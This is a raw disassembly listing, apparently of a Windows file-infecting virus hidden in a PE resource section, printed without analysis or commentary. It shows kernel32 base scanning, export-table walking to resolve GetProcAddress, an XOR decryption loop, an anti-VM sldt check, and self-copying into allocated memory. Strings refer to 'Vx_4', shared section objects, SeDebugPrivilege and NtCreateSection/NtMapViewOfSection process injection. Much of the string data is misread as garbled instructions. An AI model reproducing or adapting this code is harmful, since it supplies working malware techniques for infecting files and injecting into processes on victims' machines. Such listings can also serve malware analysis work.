lea esi, [ebp+1039CCh]
mov ecx, 0E4h
rep movsb
sldt cx
test ecx, ecx
jnz short loc_43207B
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_43207B: ; CODE XREF: .rsrc:00432074�j
and ebx, 0FFFFF000h
loc_432081: ; CODE XREF: .rsrc:00432090�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_432092
loc_43208A: ; CODE XREF: .rsrc:0043209F�j
sub ebx, 100h
jnz short loc_432081
loc_432092: ; CODE XREF: .rsrc:00432088�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_43208A
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_4320AC: ; CODE XREF: .rsrc:loc_4320C0�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_4320C0
cmp dword ptr [eax+5], 6441636Fh
jz short loc_4320C5
loc_4320C0: ; CODE XREF: .rsrc:004320B5�j
loop loc_4320AC
pop ecx
jmp short loc_4320F0
; ---------------------------------------------------------------------------
loc_4320C5: ; CODE XREF: .rsrc:004320BE�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_432137
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43217E
loc_4320F0: ; CODE XREF: .rsrc:004320C3�j
; sub_43217E+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_43211C
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_43211C: ; CODE XREF: sub_43217E-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_43217E
; ---------------------------------------------------------------------------
dw 7E0h
; =============== S U B R O U T I N E =======================================
sub_432120 proc near ; CODE XREF: sub_43445B+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_432128: ; CODE XREF: sub_432120+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_432128
pop ebx
retn
sub_432120 endp
; ---------------------------------------------------------------------------
loc_432137: ; CODE XREF: .rsrc:004320EE�j
call near ptr loc_432146+2
inc ebx
insb
outsd
jnb short near ptr loc_4321A3+3
dec eax
popa
outsb
db 64h
insb
loc_432146: ; CODE XREF: .rsrc:loc_432137�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_432162+1
inc ebx
jb short loc_4321BE
popa
jz short near ptr loc_4321C0+1
inc ebp
jbe short near ptr loc_4321C0+4
outsb
jz short loc_4321A3
loc_432162: ; CODE XREF: .rsrc:00432151�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_43217E
inc edi
db 65h
jz short near ptr loc_4321C0+1
popa
jnb short near ptr loc_4321EA+2
inc ebp
jb short near ptr loc_4321EA+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_43217E proc near ; CODE XREF: .rsrc:0043216C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004320F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 00432534 SIZE 0000000B BYTES
push ebx
call esi
mov [ebp+103E6Ah], eax
call sub_43255F
test eax, eax
jz loc_4320F0
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_432534
loc_4321A3: ; CODE XREF: .rsrc:00432160�j
; .rsrc:0043213F�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_4321C0
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_4321BE: ; CODE XREF: .rsrc:00432157�j
jmp short loc_4321C7
; ---------------------------------------------------------------------------
loc_4321C0: ; CODE XREF: sub_43217E+2C�j
; .rsrc:0043215A�j ...
and dword ptr [ebp+101598h], 0
loc_4321C7: ; CODE XREF: sub_43217E:loc_4321BE�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_4321EA: ; CODE XREF: .rsrc:00432176�j
; .rsrc:00432179�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_43259C
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_4322E3
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_432534
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_432534
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_432534
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_4322D3
jmp loc_432534
; ---------------------------------------------------------------------------
loc_4322D3: ; CODE XREF: sub_43217E+14B�p
; sub_43217E+162�j
push 0
pop ecx
jecxz short locret_4322E2
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_4322D3
; ---------------------------------------------------------------------------
locret_4322E2: ; CODE XREF: sub_43217E+158�j
retn
; ---------------------------------------------------------------------------
loc_4322E3: ; CODE XREF: sub_43217E+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_432534
call near ptr loc_4322FA+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_4322FA: ; CODE XREF: sub_43217E+172�p
add bh, bh
sub_43217E endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_43259C
cmp dword ptr [ebp+103F2Eh], 0
jz loc_432534
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_432534
mov ecx, [ebp+103F06h]
jecxz short loc_432383
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_432383
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_432383: ; CODE XREF: .rsrc:00432367�j
; .rsrc:00432378�j
call sub_432540
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_4323CC: ; CODE XREF: .rsrc:004323D5�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_4323CC
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_432534
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43217E
loc_432534: ; CODE XREF: sub_43217E+1F�j
; sub_43217E+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_4320F0
; END OF FUNCTION CHUNK FOR sub_43217E
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_432540 proc near ; CODE XREF: .rsrc:loc_432383�p
; sub_43255F+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_432540 endp
; ---------------------------------------------------------------------------
aVx_4_0 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_43255F proc near ; CODE XREF: sub_43217E+9�p
xor ecx, ecx
call sub_432540
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_43255F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 585858h, 3328h, 0E73h, 1, 2 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_43259C proc near ; CODE XREF: sub_43217E+7C�p
; .rsrc:00432312�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_4325A7: ; CODE XREF: sub_43259C+E�j
lodsb
test al, al
jnz short loc_4325A7
loop sub_43259C
retn
sub_43259C endp
; =============== S U B R O U T I N E =======================================
sub_4325AF proc near ; CODE XREF: sub_43412D+25�p
; FUNCTION CHUNK AT 00432639 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 00432A09 SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_4325DC+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_432639
jbe short near ptr loc_432639+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_432640
inc ecx
loc_4325DC: ; CODE XREF: sub_4325AF+13�p
add [eax-1], dl
sub_4325AF endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4325AF
loc_432639: ; CODE XREF: sub_4325AF+1F�j
; sub_4325AF+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_4326A3+2
loc_432640: ; CODE XREF: sub_4325AF+2A�j
push edx
db 65h
insd
outsd
jz short loc_4326AB
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_4326B6+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_4326C2+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_4326E1+1
push 4500746Fh
js short loc_4326DF
jz short near ptr loc_4326CB+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_432700
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_4326E3+6
loc_4326A3: ; CODE XREF: sub_4325AF+8F�j
imul ebp, [ebp+41h], 69727474h
loc_4326AB: ; CODE XREF: sub_4325AF+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_4326F2
add [edi+65h], al
jz short near ptr loc_4326FB+1
loc_4326B6: ; CODE XREF: sub_4325AF+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_432708
loc_4326C2: ; CODE XREF: sub_4325AF+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_4326CB: ; CODE XREF: sub_4325AF+C7�j
db 65h
jz short near ptr loc_43271A+1
outsd
db 64h
jnz short near ptr loc_432739+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_43272D+6
loc_4326DF: ; CODE XREF: sub_4325AF+C5�j
db 65h
insd
loc_4326E1: ; CODE XREF: sub_4325AF+BE�j
jo short near ptr loc_432727+2
loc_4326E3: ; CODE XREF: sub_4325AF+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_432741+3
db 65h
insd
loc_4326F2: ; CODE XREF: sub_4325AF+FF�j
jo short near ptr loc_432741+3
popa
jz short near ptr loc_43275E+1
inc ecx
add [edi+65h], al
loc_4326FB: ; CODE XREF: sub_4325AF+105�j
jz short loc_432753
db 65h
jb short near ptr loc_432772+1
loc_432700: ; CODE XREF: sub_4325AF+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_432708: ; CODE XREF: sub_4325AF+110�j
db 65h
jb short near ptr loc_43277C+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_43276B+1
outsd
insb
jnz short near ptr loc_432781+6
loc_43271A: ; CODE XREF: sub_4325AF:loc_4326CB�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_43278C+2
popa
jz short near ptr loc_43278C+1
outsd
outsb
inc ecx
loc_432727: ; CODE XREF: sub_4325AF:loc_4326E1�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_43272D: ; CODE XREF: sub_4325AF+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_43278F
loc_432739: ; CODE XREF: sub_4325AF+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_432741: ; CODE XREF: sub_4325AF+13F�j
; sub_4325AF:loc_4326F2�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_432753: ; CODE XREF: sub_4325AF:loc_4326FB�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_4327C9+1
arpl [ebp+73h], sp
loc_43275E: ; CODE XREF: sub_4325AF+146�j
jnb short $+2
push eax
jb short loc_4327D2
arpl [ebp+73h], sp
jnb short near ptr loc_432794+7
xor al, [esi+69h]
loc_43276B: ; CODE XREF: sub_4325AF+164�j
jb short near ptr loc_4327DA+6
jz short $+2
push eax
jb short near ptr loc_4327DA+7
loc_432772: ; CODE XREF: sub_4325AF+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_4327A9+1
xor cl, [esi+65h]
js short near ptr loc_4327EC+4
loc_43277C: ; CODE XREF: sub_4325AF:loc_432708�j
add [ebx+65h], dl
jz short near ptr loc_4327C5+2
loc_432781: ; CODE XREF: sub_4325AF+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_43278C: ; CODE XREF: sub_4325AF+173�j
; sub_4325AF+170�j
db 65h
jnb short loc_4327D0
loc_43278F: ; CODE XREF: sub_4325AF+188�j
add [ebx+65h], dl
jz short loc_4327DA
loc_432794: ; CODE XREF: sub_4325AF+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_432818
jz short loc_43280C
insd
push esp
loc_4327A9: ; CODE XREF: sub_4325AF+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_432813
imul esp, [ebp+77h], 6946664Fh
insb
loc_4327C5: ; CODE XREF: sub_4325AF+1D0�j
add gs:[esi+69h], dl
loc_4327C9: ; CODE XREF: sub_4325AF+1AA�j
jb short near ptr loc_43283E+1
jnz short loc_43282E
insb
inc ecx
insb
loc_4327D0: ; CODE XREF: sub_4325AF:loc_43278C�j
insb
outsd
loc_4327D2: ; CODE XREF: sub_4325AF+1B2�j
arpl [eax], ax
push edi
jb short loc_432840
jz short loc_43283E
inc esi
loc_4327DA: ; CODE XREF: sub_4325AF+1E3�j
; sub_4325AF:loc_43276B�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_43285A
push eax
jb short near ptr loc_43284F+3
jbe short near ptr loc_43284F+5
insb
loc_4327EC: ; CODE XREF: sub_4325AF+1CB�j
db 65h, 67h, 65h
jnb near ptr 2845h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_43283B+1
jb short near ptr loc_43285F+1
popa
jz short loc_432863
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_432870
push eax
loc_43280C: ; CODE XREF: sub_4325AF+1F6�j
jb short loc_43287D
arpl [ebp+73h], sp
jnb short $+2
loc_432813: ; CODE XREF: sub_4325AF+20C�j
dec esi
jz short near ptr loc_432856+3
jb short loc_43287D
loc_432818: ; CODE XREF: sub_4325AF+1F4�j
popa
jz short loc_432880
push eax
jb short loc_43288D
arpl [ebp+73h], sp
jnb short near ptr loc_432863+5
js short $+2
dec esi
jz short loc_43286B
jb short loc_43288F
popa
jz short near ptr loc_43288F+3
push ebx
loc_43282E: ; CODE XREF: sub_4325AF+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_43289E+1
popa
loc_43283B: ; CODE XREF: sub_4325AF+248�j
jz short loc_4328A2
push ebp
loc_43283E: ; CODE XREF: sub_4325AF+228�j
; sub_4325AF:loc_4327C9�j
jnb short near ptr loc_4328A4+1
loc_432840: ; CODE XREF: sub_4325AF+226�j
jb short near ptr loc_43288F+3
jb short loc_4328B3
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_432899
popa
jo short near ptr loc_4328A4+1
loc_43284F: ; CODE XREF: sub_4325AF+238�j
; sub_4325AF+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_432856: ; CODE XREF: sub_4325AF+265�j
arpl [ecx+ebp*2+6Fh], si
loc_43285A: ; CODE XREF: sub_4325AF+235�j
outsb
add [esi+74h], cl
dec edi
loc_43285F: ; CODE XREF: sub_4325AF+24A�j
jo short loc_4328C6
outsb
inc esi
loc_432863: ; CODE XREF: sub_4325AF+24D�j
; sub_4325AF+272�j
imul ebp, [ebp+0], 704F744Eh
loc_43286B: ; CODE XREF: sub_4325AF+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_4328DF
loc_432870: ; CODE XREF: sub_4325AF+25A�j
arpl [ebp+73h], sp
jnb short loc_4328C9
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_4328CB+1
loc_43287D: ; CODE XREF: sub_4325AF:loc_43280C�j
; sub_4325AF+267�j
jo short near ptr loc_4328E3+1
outsb
loc_432880: ; CODE XREF: sub_4325AF+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_4328FB+1
loc_43288D: ; CODE XREF: sub_4325AF+26D�j
jz short near ptr loc_4328F3+1
loc_43288F: ; CODE XREF: sub_4325AF+279�j
; sub_4325AF+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_432909
jnz short near ptr loc_4328F7+1
insb
dec ebp
loc_432899: ; CODE XREF: sub_4325AF+29B�j
db 65h
insd
outsd
jb short near ptr loc_432914+3
loc_43289E: ; CODE XREF: sub_4325AF+289�j
add [esi+74h], cl
push ecx
loc_4328A2: ; CODE XREF: sub_4325AF:loc_43283B�j
jnz short loc_432909
loc_4328A4: ; CODE XREF: sub_4325AF:loc_43283E�j
; sub_4325AF+29E�j
jb short near ptr loc_43291E+1
dec ecx
outsb
outsw
jb short near ptr loc_432918+1
popa
jz short loc_432918
outsd
outsb
push esp
outsd
loc_4328B3: ; CODE XREF: sub_4325AF+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_43290F+2
jb short loc_432925
jz short near ptr loc_432922+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_4328C6: ; CODE XREF: sub_4325AF:loc_43285F�j
db 65h
insd
outsd
loc_4328C9: ; CODE XREF: sub_4325AF+2C4�j
jb short loc_432944
loc_4328CB: ; CODE XREF: sub_4325AF+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_432941+2
outsb
db 67h
push esp
outsd
inc ecx
loc_4328DF: ; CODE XREF: sub_4325AF+2BF�j
outsb
jnb short near ptr loc_43294A+1
push ebx
loc_4328E3: ; CODE XREF: sub_4325AF:loc_43287D�j
jz short loc_432957
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_432950
jb short loc_432965
jnz short near ptr loc_432962+1
loc_4328F3: ; CODE XREF: sub_4325AF:loc_43288D�j
add [ebx+6Ch], ah
outsd
loc_4328F7: ; CODE XREF: sub_4325AF+2E6�j
jnb short loc_43295E
jnb short near ptr loc_432969+1
loc_4328FB: ; CODE XREF: sub_4325AF+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_432909: ; CODE XREF: sub_4325AF+2E4�j
; sub_4325AF:loc_4328A2�j
db 65h
jz short near ptr loc_432973+1
outsd
jnb short near ptr loc_432981+2
loc_43290F: ; CODE XREF: sub_4325AF+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_432914: ; CODE XREF: sub_4325AF+2ED�j
add gs:[edx+65h], dh
loc_432918: ; CODE XREF: sub_4325AF+2FE�j
; sub_4325AF+2FB�j
arpl [esi+0], si
jnb short near ptr loc_432981+1
outsb
loc_43291E: ; CODE XREF: sub_4325AF:loc_4328A4�j
add fs:[ebx+6Fh], dh
loc_432922: ; CODE XREF: sub_4325AF+30D�j
arpl [ebx+65h], bp
loc_432925: ; CODE XREF: sub_4325AF+30B�j
jz short $+2
dec ecx
outsb
jz short loc_432990
jb short loc_43299B
db 65h
jz short loc_432973
insb
outsd
jnb short near ptr loc_432998+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_4329A4
jb short near ptr loc_4329AE+1
loc_432941: ; CODE XREF: sub_4325AF+329�j
db 65h
jz short loc_43298B
loc_432944: ; CODE XREF: sub_4325AF:loc_4328C9�j
db 65h
jz short loc_43298A
outsd
outsb
outsb
loc_43294A: ; CODE XREF: sub_4325AF+331�j
arpl gs:[ebp+64h], si
push ebx
loc_432950: ; CODE XREF: sub_4325AF+33E�j
jz short near ptr loc_4329B2+1
jz short loc_4329B9
add [ecx+6Eh], cl
loc_432957: ; CODE XREF: sub_4325AF:loc_4328E3�j
jz short near ptr loc_4329BC+2
jb short loc_4329C9
db 65h
jz short near ptr loc_4329AB+2
loc_43295E: ; CODE XREF: sub_4325AF:loc_4328F7�j
jo short loc_4329C5
outsb
inc ecx
loc_432962: ; CODE XREF: sub_4325AF+342�j
add [ecx+6Eh], cl
loc_432965: ; CODE XREF: sub_4325AF+340�j
jz short near ptr loc_4329CB+1
jb short loc_4329D7
loc_432969: ; CODE XREF: sub_4325AF+34A�j
db 65h
jz short near ptr loc_4329BA+1
jo short loc_4329D3
outsb
push ebp
jb short near ptr loc_4329DC+2
inc ecx
loc_432973: ; CODE XREF: sub_4325AF+37E�j
; sub_4325AF:loc_432909�j
add [ecx+6Eh], cl
jz short near ptr loc_4329DC+1
jb short loc_4329E8
db 65h
jz short near ptr loc_4329CE+1
db 65h
popa
db 64h
inc esi
loc_432981: ; CODE XREF: sub_4325AF+36C�j
; sub_4325AF+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_43298A: ; CODE XREF: sub_4325AF:loc_432944�j
dec ecx
loc_43298B: ; CODE XREF: sub_4325AF:loc_432941�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_432990: ; CODE XREF: sub_4325AF+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_432998: ; CODE XREF: sub_4325AF+383�j
jnb short near ptr loc_4329FD+2
dec ebx
loc_43299B: ; CODE XREF: sub_4325AF+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_432A09
loc_4329A4: ; CODE XREF: sub_4325AF+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_4329EC+2
js short loc_4329EC
loc_4329AB: ; CODE XREF: sub_4325AF+3AC�j
add [edx+65h], dl
loc_4329AE: ; CODE XREF: sub_4325AF+390�j
db 67h
push ecx
jnz short loc_432A17
loc_4329B2: ; CODE XREF: sub_4325AF:loc_432950�j
jb short near ptr loc_432A2C+1
push esi
popa
insb
jnz short near ptr loc_432A1D+1
loc_4329B9: ; CODE XREF: sub_4325AF+3A3�j
inc ebp
loc_4329BA: ; CODE XREF: sub_4325AF:loc_432969�j
js short loc_4329FD
loc_4329BC: ; CODE XREF: sub_4325AF:loc_432957�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_432A1A
popa
loc_4329C5: ; CODE XREF: sub_4325AF:loc_43295E�j
insb
jnz short near ptr loc_432A2C+1
inc ebp
loc_4329C9: ; CODE XREF: sub_4325AF+3AA�j
js short loc_432A0C
loc_4329CB: ; CODE XREF: sub_4325AF:loc_432965�j
add [esi+33h], dl
loc_4329CE: ; CODE XREF: sub_4325AF+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_4329D3: ; CODE XREF: sub_4325AF+3BD�j
mov edx, esp
push 1
loc_4329D7: ; CODE XREF: sub_4325AF+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_4329DC: ; CODE XREF: sub_4325AF+3C7�j
; sub_4325AF+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_4329E8: ; CODE XREF: sub_4325AF+3C9�j
push esi
push dword ptr [eax+18h]
loc_4329EC: ; CODE XREF: sub_4325AF+3FA�j
; sub_4325AF+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_4325AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ; û
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_4329FD: ; CODE XREF: sub_4325AF:loc_4329BA�j
; sub_4325AF:loc_432998�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ; è
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4325AF
loc_432A09: ; CODE XREF: sub_4325AF+3F3�j
add [edx+5], ch
loc_432A0C: ; CODE XREF: sub_4325AF:loc_4329C9�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_432A17: ; CODE XREF: sub_4325AF+401�j
push esp
push 40h
loc_432A1A: ; CODE XREF: sub_4325AF+412�j
push ecx
push edx
push ebx
loc_432A1D: ; CODE XREF: sub_4325AF+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_432A2C: ; CODE XREF: sub_4325AF:loc_4329B2�j
; sub_4325AF+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_4325AF
; ---------------------------------------------------------------------------
